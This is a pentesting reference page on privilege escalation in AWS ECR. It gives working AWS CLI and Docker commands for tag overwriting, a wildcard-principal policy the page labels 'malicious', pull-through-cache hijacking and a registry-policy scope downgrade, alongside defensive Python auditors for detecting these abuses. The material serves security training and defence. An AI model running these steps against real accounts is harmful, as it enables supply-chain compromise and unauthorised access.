AWS - ECR Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

An attacker with ecr:GetAuthorizationToken and ecr:BatchGetImage can log in to ECR and download images. Note that ecr:BatchGetImage on its own only returns the image manifest; a complete docker pull also needs ecr:GetDownloadUrlForLayer to fetch the layer blobs, so check for that permission too when assessing what can actually be exfiltrated.

For more info on how to download images:

AWS - ECR Post Exploitation

Potential Impact: Indirect privesc by recovering sensitive information (credentials, tokens, configuration) baked into the pulled images.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

An attacker with all of these permissions can log in to ECR and push images. This can be used to escalate privileges in other environments where those images are run.

Moreover, ecr:PutImage can be used to overwrite an existing tag (for example stable / prod) by pushing a different image manifest under that tag, hijacking every deployment that resolves the tag. This only works while the repository's tag mutability is MUTABLE; an IMMUTABLE repository rejects the overwrite with ImageTagAlreadyExistsException (see ecr:PutImageTagMutability below for how that setting itself can be flipped).

This becomes especially relevant when downstream consumers deploy by tag and pick up tag changes automatically, such as:

  • Lambda container image functions (PackageType=Image) that reference .../repo:stable (Lambda resolves the tag to a digest at UpdateFunctionCode time, so the poisoned image lands on the next deploy rather than instantly)
  • ECS services / Kubernetes workloads that pull repo:prod (without digest pinning)
  • Any CI/CD that redeploys on ECR events

In those cases, a tag overwrite can lead to remote code execution in the victim's environment and privilege escalation to the IAM role the workload runs under (for example, a Lambda execution role with secretsmanager:GetSecretValue).
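The defensive counterpart to the tag-overwrite attack is an inventory of which workloads would actually pick it up. The Python below is an added example, not code from HackTricks or AWS: it parses OCI image references and flags every workload that pulls by mutable tag (or by implicit latest) instead of by digest, and notes whether the reference points at a private ECR registry. The workload list is constructed sample data shaped like the fields you would export from `aws lambda get-function` (Code.ImageUri), `aws ecs describe-task-definition` (containerDefinitions[].image) and `kubectl get pods -o json` (spec.containers[].image); the account id 123456789012 and the repository names are placeholders.

```python
"""Flag container workloads that would silently pick up an ECR tag overwrite.

Added example (not HackTricks/AWS code). The inventory below is constructed
sample data; real data would come from `aws lambda get-function`,
`aws ecs describe-task-definition` or `kubectl get pods -o json`.
"""
from __future__ import annotations

import re

# OCI reference grammar (simplified): [registry/]repo[:tag][@sha256:digest]
_REF = re.compile(
    r"^(?:(?P<registry>[^/]+\.[^/]+(?::\d+)?)/)?"   # host needs a dot to count as a registry
    r"(?P<repo>[a-z0-9][a-z0-9._/-]*?)"
    r"(?::(?P<tag>[\w][\w.-]{0,127}))?"
    r"(?:@(?P<digest>sha256:[0-9a-f]{64}))?$"
)
_PRIVATE_ECR = re.compile(r"^\d{12}\.dkr\.ecr\.[a-z0-9-]+\.amazonaws\.com$")


def parse_ref(ref: str) -> dict:
    """Split an image reference into registry, repo, tag and digest."""
    m = _REF.match(ref)
    if not m:
        raise ValueError(f"unparseable image reference: {ref!r}")
    parts = m.groupdict()
    parts["registry"] = parts["registry"] or "docker.io"   # Docker's default registry
    return parts


def classify(ref: str) -> str:
    """'pinned' (by digest), 'mutable-tag' (by tag) or 'implicit-latest' (neither)."""
    parts = parse_ref(ref)
    if parts["digest"]:
        return "pinned"
    return "mutable-tag" if parts["tag"] else "implicit-latest"


def audit(workloads: list[dict]) -> list[dict]:
    """Return one finding per workload whose image can change underneath it."""
    findings = []
    for w in workloads:
        kind = classify(w["image"])
        if kind == "pinned":
            continue                      # a digest cannot be re-pointed by PutImage
        parts = parse_ref(w["image"])
        findings.append({
            "workload": w["name"],
            "image": w["image"],
            "issue": kind,
            "private_ecr": bool(_PRIVATE_ECR.match(parts["registry"])),
            "fix": f"pin to {parts['registry']}/{parts['repo']}@sha256:<digest>",
        })
    return findings


# Constructed sample inventory (placeholder account id and repositories).
SAMPLE_WORKLOADS = [
    {"name": "lambda:payments-api",
     "image": "123456789012.dkr.ecr.us-east-1.amazonaws.com/payments/api:stable"},
    {"name": "ecs:web",
     "image": "123456789012.dkr.ecr.us-east-1.amazonaws.com/web:prod@sha256:" + "a" * 64},
    {"name": "k8s:worker",
     "image": "123456789012.dkr.ecr.us-east-1.amazonaws.com/jobs/worker"},
    {"name": "k8s:sidecar",
     "image": "public.ecr.aws/docker/library/alpine:3.19"},
]

if __name__ == "__main__":
    for f in audit(SAMPLE_WORKLOADS):
        scope = "private ECR" if f["private_ecr"] else "external registry"
        print(f"[{f['issue']}] {f['workload']} -> {f['image']} ({scope}); {f['fix']}")
```

Run it against the real inventory export and every `mutable-tag` / `implicit-latest` finding on a private ECR host is a workload that the overwrite described above (or a PTC or mutability attack later on this page) would hijack; a digest-pinned reference is immune because ecr:PutImage cannot change what a digest resolves to.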

To learn how to upload a new image/update one, check:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

As in the previous section, but for public repositories.

ecr:SetRepositoryPolicy

An attacker with this permission can change the repository policy to grant themselves (or even everyone) read/write access. A private ECR repository never serves anonymous pulls: a Principal of "*" means any authenticated AWS identity from any account, each of which still needs its own auth token (ecr:GetAuthorizationToken plus the matching ecr:* permissions in its own identity policy).
For example, the following policy grants read access to everyone:

```bash
aws ecr set-repository-policy \
  --repository-name <repo_name> \
  --policy-text file://my-policy.json
```

Content of my-policy.json:

```json
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "allow public pull",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr:BatchCheckLayerAvailability",
        "ecr:BatchGetImage",
        "ecr:GetDownloadUrlForLayer"
      ]
    }
  ]
}
```
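To catch this from the defender's side you want to scan every repository policy for principals outside your own accounts. The Python below is an added example, not code from HackTricks or AWS: it flattens the Principal element, matches Action wildcards with shell-style globbing, and rates each grant by whether it reaches beyond a trusted account set and whether it allows write actions (push, delete, or changing the policy itself). The two policy documents are constructed samples shaped like the `policyText` string returned by `aws ecr get-repository-policy`; the account ids 111122223333 and 999999999999 are placeholders.

```python
"""Audit ECR repository policies for over-broad principals.

Added example (not HackTricks/AWS code). The policies below are constructed
sample documents shaped like the `policyText` string from
`aws ecr get-repository-policy`; account ids are placeholders.
"""
from __future__ import annotations

import json
from fnmatch import fnmatchcase

# Actions that let a principal change what a tag resolves to, or who may.
WRITE_ACTIONS = {
    "ecr:PutImage", "ecr:InitiateLayerUpload", "ecr:UploadLayerPart",
    "ecr:CompleteLayerUpload", "ecr:BatchDeleteImage",
    "ecr:SetRepositoryPolicy", "ecr:DeleteRepositoryPolicy",
    "ecr:PutImageTagMutability",
}


def _as_list(value) -> list:
    return value if isinstance(value, list) else [value]


def _principals(principal) -> list[str]:
    """Flatten Principal ('*', 'arn', or {'AWS': [...], ...}) to plain strings."""
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        return [p for v in principal.values() for p in _as_list(v)]
    return _as_list(principal)


def _account_of(principal: str) -> str:
    """'arn:aws:iam::111122223333:role/x' -> '111122223333'; '*' and bare ids pass through."""
    if principal == "*" or ":" not in principal:
        return principal
    fields = principal.split(":")
    return fields[4] if len(fields) > 4 and fields[4] else "*"


def audit_repo_policy(repo: str, policy_text: str, trusted_accounts: set[str]) -> list[dict]:
    """One finding per (statement, principal) that grants access beyond the trusted accounts."""
    findings = []
    for st in _as_list(json.loads(policy_text).get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action", []))
        # fnmatchcase lets "ecr:*" or "ecr:Put*" match the concrete write actions.
        grants_write = any(fnmatchcase(w, a) for a in actions for w in WRITE_ACTIONS)
        for p in _principals(st.get("Principal", {})):
            acct = _account_of(p)
            if acct in trusted_accounts:
                continue
            if acct == "*":
                severity = "CRITICAL" if grants_write else "HIGH"
                who = "any authenticated AWS identity (private ECR has no anonymous access)"
            else:
                severity = "HIGH" if grants_write else "MEDIUM"
                who = f"untrusted account {acct}"
            findings.append({
                "repo": repo, "sid": st.get("Sid", ""), "severity": severity,
                "principal": p, "who": who, "write": grants_write,
                "conditioned": "Condition" in st,   # a Condition may narrow the grant; review it by hand
            })
    return findings


# Constructed sample: the public-pull policy shown in the section above.
PUBLIC_PULL = json.dumps({
    "Version": "2008-10-17",
    "Statement": [{
        "Sid": "allow public pull", "Effect": "Allow", "Principal": "*",
        "Action": ["ecr:BatchCheckLayerAvailability", "ecr:BatchGetImage",
                   "ecr:GetDownloadUrlForLayer"],
    }],
})

# Constructed sample: a push grant that includes an account outside the trusted set.
CROSS_ACCOUNT_PUSH = json.dumps({
    "Version": "2008-10-17",
    "Statement": [{
        "Sid": "ci-push", "Effect": "Allow",
        "Principal": {"AWS": ["arn:aws:iam::999999999999:role/ci",
                              "arn:aws:iam::111122223333:root"]},
        "Action": ["ecr:GetDownloadUrlForLayer", "ecr:BatchGetImage", "ecr:Put*"],
    }],
})

TRUSTED = {"111122223333"}

if __name__ == "__main__":
    for name, text in (("app", PUBLIC_PULL), ("app", CROSS_ACCOUNT_PUSH)):
        for f in audit_repo_policy(name, text, TRUSTED):
            print(f"{f['severity']:8} {f['repo']} sid={f['sid']!r} {f['principal']} write={f['write']}")
```

Feed it the output of `aws ecr describe-repositories` followed by `aws ecr get-repository-policy` per repository; the repository-policy check is orthogonal to the registry policy covered under ecr:PutRegistryPolicy below, so both need scanning.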

ecr-public:SetRepositoryPolicy

As in the previous section, but for public repositories.
An attacker can modify the repository policy of an ECR Public repository to grant unauthorized public access or escalate their own privileges. Pulls from ECR Public are anonymous by design, so what a policy like the one below really adds is push and policy-deletion rights for any AWS identity. The ecr-public API is only served from us-east-1.

```bash
# Create a JSON file with the malicious public repository policy
echo '{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "MaliciousPublicRepoPolicy",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr-public:GetDownloadUrlForLayer",
        "ecr-public:BatchGetImage",
        "ecr-public:BatchCheckLayerAvailability",
        "ecr-public:PutImage",
        "ecr-public:InitiateLayerUpload",
        "ecr-public:UploadLayerPart",
        "ecr-public:CompleteLayerUpload",
        "ecr-public:DeleteRepositoryPolicy"
      ]
    }
  ]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --region us-east-1 --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
```

Potential Impact: Unauthorized access to the ECR Public repository, allowing any AWS identity to push images or delete the policy (pulls were already public).

ecr:PutRegistryPolicy

An attacker with this permission can change the registry policy to grant themselves, their account (or even everyone) access at the registry level. Unlike a repository policy, a registry policy carries a Resource element (see the example under ecr:PutAccountSetting below) and its reach depends on the REGISTRY_POLICY_SCOPE account setting: under V1 it is only consulted for CreateRepository, ReplicateImage and BatchImportUpstreamImage (replication and pull-through-cache imports), while under V2 it governs every ECR action, which is what makes a broad read/write grant here effective.

```bash
aws ecr put-registry-policy \
  --policy-text file://my-policy.json
```

ecr:CreatePullThroughCacheRule

Abuse ECR Pull Through Cache (PTC) rules to map an attacker-controlled upstream namespace onto a trusted private ECR prefix. Workloads that pull from private ECR then transparently receive attacker images, with no push to private ECR required.

  • Required perms: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. If using ECR Public upstream: ecr-public:* to create/push to the public repo. In a least-privilege setup the principal doing the first pull of a not-yet-cached path also needs ecr:BatchImportUpstreamImage (and ecr:CreateRepository, since the cache repository is created on that first pull).
  • Tested upstream: public.ecr.aws

Steps (example):

  1. Prepare the attacker image in ECR Public (the ecr-public API is only served from us-east-1; the build assumes a Dockerfile in the current directory). Get your ECR Public alias with:

```bash
aws ecr-public describe-registries --region us-east-1
```

```bash
PUBLIC_ALIAS=<public_alias>
aws ecr-public create-repository --region us-east-1 --repository-name hacktricks-ptc-demo
aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws
docker build -t public.ecr.aws/${PUBLIC_ALIAS}/hacktricks-ptc-demo:ptc-test .
docker push public.ecr.aws/${PUBLIC_ALIAS}/hacktricks-ptc-demo:ptc-test
```

  2. Create the PTC rule in private ECR to map a trusted prefix to the public registry:

```bash
aws ecr create-pull-through-cache-rule --region us-east-2 --ecr-repository-prefix ptc --upstream-registry-url public.ecr.aws
```

  3. Pull the attacker image via the private ECR path (no push to private ECR was done):

```bash
aws ecr get-login-password --region us-east-2 | docker login --username AWS --password-stdin <account_id>.dkr.ecr.us-east-2.amazonaws.com
docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
docker run --rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
```

Potential Impact: Supply-chain compromise by squatting internal image names under the chosen prefix. Any workload that pulls images from private ECR using that prefix receives attacker-controlled content.

ecr:PutImageTagMutability

Abuse this permission to flip a repository from tag immutability (IMMUTABLE) to MUTABLE and overwrite trusted tags (e.g., latest, stable, prod) with attacker-controlled content.

  • Required perms: ecr:PutImageTagMutability plus push capabilities (ecr:GetAuthorizationToken, ecr:InitiateLayerUpload, ecr:UploadLayerPart, ecr:CompleteLayerUpload, ecr:PutImage).
  • Impact: Supply-chain compromise by silently replacing tags that were immutable, without changing any tag name. Defenders should alert on PutImageTagMutability events in CloudTrail and periodically confirm via DescribeRepositories that imageTagMutability is still IMMUTABLE on the repositories that matter.

Steps (example):

Overwrite an immutable tag by flipping mutability:

```bash
REGION=us-east-1
REPO=ht-immutable-demo-$RANDOM
aws ecr create-repository --region $REGION --repository-name $REPO --image-tag-mutability IMMUTABLE
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com

# Build and push initial trusted tag
printf 'FROM alpine:3.19\nCMD echo V1\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod

# Attempt overwrite while IMMUTABLE (should fail with ImageTagAlreadyExistsException)
printf 'FROM alpine:3.19\nCMD echo V2\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod

# Flip to MUTABLE and overwrite
aws ecr put-image-tag-mutability --region $REGION --repository-name $REPO --image-tag-mutability MUTABLE
docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod

# Validate consumers pulling by tag now get the poisoned image (prints V2).
# Drop the local copy first so the run really pulls from ECR instead of the local V2 build.
docker rmi ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
```

Global registry hijack via a ROOT Pull-Through Cache rule

Create a Pull-Through Cache (PTC) rule using the special ecrRepositoryPrefix=ROOT to map the root of the private ECR registry to an upstream public registry (for example, ECR Public). Any pull of a repository that does not exist in the private registry is transparently served from upstream, enabling supply-chain hijacking without uploading anything to private ECR.

  • Required permissions: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule, ecr:GetAuthorizationToken.
  • Impact: Pulls of <account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag> succeed and automatically create private repositories derived from upstream.

Note: For ROOT rules, do not use --upstream-repository-prefix. Supplying it causes a validation error.

<details>
<summary>Demo (us-east-1, upstream public.ecr.aws)</summary>

```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)

# 1) Create ROOT PTC rule mapping to ECR Public (no upstream prefix)
aws ecr create-pull-through-cache-rule \
  --region "$REGION" \
  --ecr-repository-prefix ROOT \
  --upstream-registry-url public.ecr.aws

# 2) Authenticate to private ECR and pull via root path (triggers caching & auto repo creation)
aws ecr get-login-password --region "$REGION" | docker login --username AWS --password-stdin ${ACCT}.dkr.ecr.${REGION}.amazonaws.com

# Example using an official mirror path hosted in ECR Public
# (public.ecr.aws/docker/library/alpine:latest)
docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest

# 3) Verify repo and image now exist without any push
aws ecr describe-repositories --region "$REGION" \
  --query "repositories[?repositoryName=='docker/library/alpine']"
aws ecr list-images --region "$REGION" --repository-name docker/library/alpine --filter tagStatus=TAGGED

# 4) Cleanup
aws ecr delete-pull-through-cache-rule --region "$REGION" --ecr-repository-prefix ROOT
aws ecr delete-repository --region "$REGION" --repository-name docker/library/alpine --force || true
```

</details>
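The two PTC techniques on this page (the prefixed rule under ecr:CreatePullThroughCacheRule and the ROOT rule just above) differ only in which private paths get mapped onto the upstream. The Python below is an added example, not code from HackTricks or AWS, that models that mapping so you can answer "what does this pull actually resolve to, and which paths can an attacker populate?" from a rule list. The rule list is constructed sample data shaped like `pullThroughCacheRules[]` from `aws ecr describe-pull-through-cache-rules`, and `evil-alias` is a hypothetical ECR Public alias. Two behaviours are modelled as assumptions rather than documented facts: a repository that already exists in the private registry is served locally, and a specific prefix rule wins over a ROOT rule when both match.

```python
"""Model what a private-ECR pull resolves to under pull-through cache (PTC) rules.

Added example (not HackTricks/AWS code). Rules are constructed sample data
shaped like `aws ecr describe-pull-through-cache-rules` output. Assumptions
(not documented facts): an existing private repo shadows PTC, and the
longest matching prefix beats ROOT.
"""
from __future__ import annotations

ROOT = "ROOT"


def resolve_pull(repo_path: str, rules: list[dict], existing_repos: set[str]) -> tuple[str, str]:
    """Where `docker pull <acct>.dkr.ecr.<region>.amazonaws.com/<repo_path>:<tag>` is served from.

    Returns ('local', repo_path), ('upstream', '<upstream_url>/<path>') or
    ('not-found', repo_path).
    """
    if repo_path in existing_repos:
        return ("local", repo_path)           # assumption: existing repo shadows PTC

    best_len, best_rule, remainder = -1, None, repo_path
    for rule in rules:
        prefix = rule["ecrRepositoryPrefix"]
        if prefix == ROOT:
            match_len, rest = 0, repo_path    # ROOT matches every path, lowest priority
        elif repo_path.startswith(prefix + "/"):
            match_len, rest = len(prefix), repo_path[len(prefix) + 1:]
        else:
            continue
        if match_len > best_len:              # assumption: longest prefix wins
            best_len, best_rule, remainder = match_len, rule, rest
    if best_rule is None:
        return ("not-found", repo_path)

    upstream = best_rule["upstreamRegistryUrl"].rstrip("/")
    if best_rule.get("upstreamRepositoryPrefix"):      # never set on ROOT rules (see note above)
        upstream += "/" + best_rule["upstreamRepositoryPrefix"]
    return ("upstream", f"{upstream}/{remainder}")


def hijack_surface(rules: list[dict], attacker_alias: str) -> list[str]:
    """Private-registry paths an attacker who controls public.ecr.aws/<attacker_alias> can populate."""
    paths = []
    for rule in rules:
        if rule["upstreamRegistryUrl"].rstrip("/") != "public.ecr.aws":
            continue                          # other upstreams need their own attacker account
        up_prefix = rule.get("upstreamRepositoryPrefix")
        if up_prefix and up_prefix != attacker_alias:
            continue                          # pinned to someone else's upstream namespace
        prefix = rule["ecrRepositoryPrefix"]
        base = "" if prefix == ROOT else prefix + "/"
        paths.append(f"{base}{attacker_alias}/<any-repo>:<any-tag>")
    return paths


# Constructed sample rules: the prefixed rule from the first PTC section and the ROOT rule above.
SAMPLE_RULES = [
    {"ecrRepositoryPrefix": "ptc", "upstreamRegistryUrl": "public.ecr.aws"},
    {"ecrRepositoryPrefix": ROOT, "upstreamRegistryUrl": "public.ecr.aws"},
]
EXISTING_REPOS = {"internal/api"}   # constructed: a repository the account genuinely owns

if __name__ == "__main__":
    for path in ("docker/library/alpine", "ptc/evil-alias/hacktricks-ptc-demo", "internal/api"):
        print(path, "->", resolve_pull(path, SAMPLE_RULES, EXISTING_REPOS))
    print("attacker can serve:", hijack_surface(SAMPLE_RULES, "evil-alias"))
```

The ROOT case is the one to watch: with a ROOT rule pointing at public.ecr.aws, every ECR Public alias in existence becomes a top-level namespace in the private registry, so an attacker needs nothing more than their own public alias and a typo or a missing repository on the victim side.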

### `ecr:PutAccountSetting` (downgrade `REGISTRY_POLICY_SCOPE` to bypass registry policy restrictions)

Use `ecr:PutAccountSetting` to change the registry policy scope from `V2` (the registry policy applies to all ECR actions) to `V1` (the policy applies only to `CreateRepository`, `ReplicateImage` and `BatchImportUpstreamImage`). If a restrictive registry policy Deny blocks actions such as `CreatePullThroughCacheRule`, downgrading to `V1` removes that enforcement so the Allows in the attacker's identity policy take effect.

- Required permissions: `ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
- Impact: Ability to perform ECR actions that the registry policy Deny previously blocked (for example, creating PTC rules) by temporarily setting the scope to `V1`. A `PutAccountSetting` call with `REGISTRY_POLICY_SCOPE` in CloudTrail is the signal to alert on.
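The scope rule above is easy to state and easy to get wrong in a detection, so here is the evaluation written out. The Python below is an added example, not code from HackTricks or AWS: given the account's `REGISTRY_POLICY_SCOPE`, a registry policy document and an action, it says whether a Deny in that policy is actually enforced, and lists which denied actions silently stop being enforced when the scope drops from V2 to V1 (the list a detection should emit when it sees the PutAccountSetting call). The Deny policy is the one used in the demo on this page; the role ARN is a placeholder.

```python
"""Decide whether a registry-policy Deny is enforced under REGISTRY_POLICY_SCOPE.

Added example (not HackTricks/AWS code). V1/V2 semantics follow the section
above: under V1 the registry policy is consulted only for CreateRepository,
ReplicateImage and BatchImportUpstreamImage. The role ARN is a placeholder.
"""
from __future__ import annotations

import json
from fnmatch import fnmatchcase

V1_SCOPED_ACTIONS = {"ecr:CreateRepository", "ecr:ReplicateImage", "ecr:BatchImportUpstreamImage"}


def _as_list(value) -> list:
    return value if isinstance(value, list) else [value]


def _principal_matches(principal, arn: str) -> bool:
    """'*' matches everyone; otherwise compare against the AWS principals listed."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = _as_list(principal.get("AWS", []))
        return arn in aws or "*" in aws
    return principal == arn


def policy_consulted(scope: str, action: str) -> bool:
    """Is the registry policy even evaluated for this action under the given scope?"""
    if scope == "V2":
        return True
    if scope == "V1":
        return action in V1_SCOPED_ACTIONS
    raise ValueError(f"unknown REGISTRY_POLICY_SCOPE {scope!r}")


def denied_by_registry_policy(scope: str, policy: dict, action: str, principal_arn: str) -> bool:
    """True when an explicit Deny in the registry policy blocks `action` for `principal_arn`."""
    if not policy_consulted(scope, action):
        return False
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Deny":
            continue
        if not _principal_matches(st.get("Principal", {}), principal_arn):
            continue
        if any(fnmatchcase(action, pat) for pat in _as_list(st.get("Action", []))):
            return True
    return False


def downgrade_gaps(policy: dict, principal_arn: str) -> list[str]:
    """Denied actions that stop being enforced when the scope drops from V2 to V1."""
    gaps = set()
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Deny" or not _principal_matches(st.get("Principal", {}), principal_arn):
            continue
        for pat in _as_list(st.get("Action", [])):
            if "*" in pat:
                # A wildcard Deny keeps covering the three V1 actions; every other match is lost.
                gaps.add(f"{pat} (all matches except {', '.join(sorted(V1_SCOPED_ACTIONS))})")
            elif pat not in V1_SCOPED_ACTIONS:
                gaps.add(pat)
    return sorted(gaps)


# The Deny policy used in the demo on this page.
DENY_PTC = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "DenyPTCAll", "Effect": "Deny", "Principal": "*",
                 "Action": ["ecr:CreatePullThroughCacheRule"], "Resource": "*"}]
}""")
ROLE = "arn:aws:iam::123456789012:role/ci-deployer"   # placeholder principal

if __name__ == "__main__":
    for scope in ("V2", "V1"):
        blocked = denied_by_registry_policy(scope, DENY_PTC, "ecr:CreatePullThroughCacheRule", ROLE)
        print(f"scope={scope}: CreatePullThroughCacheRule blocked={blocked}")
    print("lost on V2->V1 downgrade:", downgrade_gaps(DENY_PTC, ROLE))
```

The practical use is on the detection side: when a `PutAccountSetting` event sets `REGISTRY_POLICY_SCOPE` to `V1`, run `downgrade_gaps` over the current registry policy and page on a non-empty result, since every action it lists is now governed solely by identity policies.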

Steps (example):

<details>
<summary>Bypass a registry policy Deny on CreatePullThroughCacheRule by switching to V1</summary>
```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)

# 0) Snapshot current scope/policy (for restore)
aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json

# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
cat > /tmp/deny-ptc.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPTCAll",
"Effect": "Deny",
"Principal": "*",
"Action": ["ecr:CreatePullThroughCacheRule"],
"Resource": "*"
}
]
}
JSON
aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION

# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
set +e
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
RC=$?
set -e
if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi

# 3) Downgrade scope to V1 and retry (should SUCCEED now)
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws

# 4) Verify rule exists
aws ecr describe-pull-through-cache-rules --region $REGION \
--query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"

# 5) Cleanup and restore
aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
else
aws ecr delete-registry-policy --region $REGION || true
fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
```

</details>
